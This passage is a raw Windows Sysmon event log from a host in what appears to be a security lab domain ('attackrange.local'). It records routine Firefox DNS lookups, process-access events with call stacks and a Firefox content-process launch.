Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000017714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.854{59A5CD1D-945A-6005-3305-00000000A301}7052i.redd.it0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.303{59A5CD1D-945A-6005-3305-00000000A301}7052alb.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.280{59A5CD1D-945A-6005-3305-00000000A301}7052l3.aaxads.com0type: 5 wildcard.aaxads.com.edgekey.net;type: 5 e12767.d.akamaiedge.net;::ffff:104.84.117.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.254{59A5CD1D-945A-6005-3305-00000000A301}7052strapi.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.113.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.097{59A5CD1D-945A-6005-3305-00000000A301}7052e11089.d.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.094{59A5CD1D-945A-6005-3305-00000000A301}7052e11089.d.akamaiedge.net0104.84.114.168;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.093{59A5CD1D-945A-6005-3305-00000000A301}7052www.aaxdetect.com0type: 5 wildcard.aaxdetect.com.edgekey.net;type: 5 e11089.d.akamaiedge.net;::ffff:104.84.114.168;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.067{59A5CD1D-945A-6005-3305-00000000A301}7052partnerad.l.doubleclick.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.066{59A5CD1D-945A-6005-3305-00000000A301}7052partnerad.l.doubleclick.net0142.250.74.194;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:27.065{59A5CD1D-945A-6005-3305-00000000A301}7052securepubads.g.doubleclick.net0type: 5 partnerad.l.doubleclick.net;::ffff:142.250.74.194;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.927{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.927{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.901{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.888{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.791{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+1104f81|C:\Program Files\Mozilla Firefox\xul.dll+270f3b4|C:\Program Files\Mozilla Firefox\xul.dll+270fdde|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000017699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.791{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+1e796c|C:\Program Files\Mozilla Firefox\xul.dll+1e78bc|C:\Program Files\Mozilla Firefox\xul.dll+1010288|C:\Program Files\Mozilla Firefox\xul.dll+106c741|C:\Program Files\Mozilla Firefox\xul.dll+270f6c8|C:\Program Files\Mozilla Firefox\xul.dll+270fdc6|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a801e6|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3|C:\Program Files\Mozilla Firefox\xul.dll+f86fb0|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+1cdbb8|C:\Program Files\Mozilla Firefox\xul.dll+1ccf4f|C:\Program Files\Mozilla Firefox\xul.dll+3d63039|C:\Program Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000017698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.788{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.784{59A5CD1D-945A-6005-3305-00000000A301}70526288C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3dfbc7b|C:\Program Files\Mozilla Firefox\xul.dll+3dfcd3d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.745{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.741{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.741{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.741{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.741{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.740{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.741{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.48.1349882379\1418278290" -parentBuildID 20210105180113 -prefsHandle 8468 -prefMapHandle 8472 -prefsLen 13279 -prefMapSize 229288 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 8580 rddC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000017688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.740{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-947C-6005-3E05-00000000A301}6280C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.721{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.698{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.583{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.583{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.496{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.486{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:28.485{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla 